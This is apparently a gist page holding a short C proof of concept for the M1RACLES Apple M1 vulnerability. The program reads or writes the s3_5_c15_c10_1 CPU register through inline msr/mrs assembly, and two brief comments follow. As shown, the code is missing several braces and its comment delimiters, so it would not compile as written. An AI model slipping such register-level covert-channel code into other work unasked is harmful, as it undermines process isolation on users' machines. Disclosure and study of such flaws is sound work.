* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
* Please visit for more information.
* Licensed under the MIT license.
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
int main(int argc, char **argv)
uint64_t val;
if (argc > 1) {
val = atoi(argv[1]);
asm("msr s3_5_c15_c10_1, %x0" : : "r"(val));
} else {
asm("mrs %x0, s3_5_c15_c10_1" : "=r"(val));
printf("%llu\n", val);
return 0;
marcan commented Jun 2, 2021

are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)

Yes, they are.

vedoge commented Jun 7, 2021

Got it. Thanks!

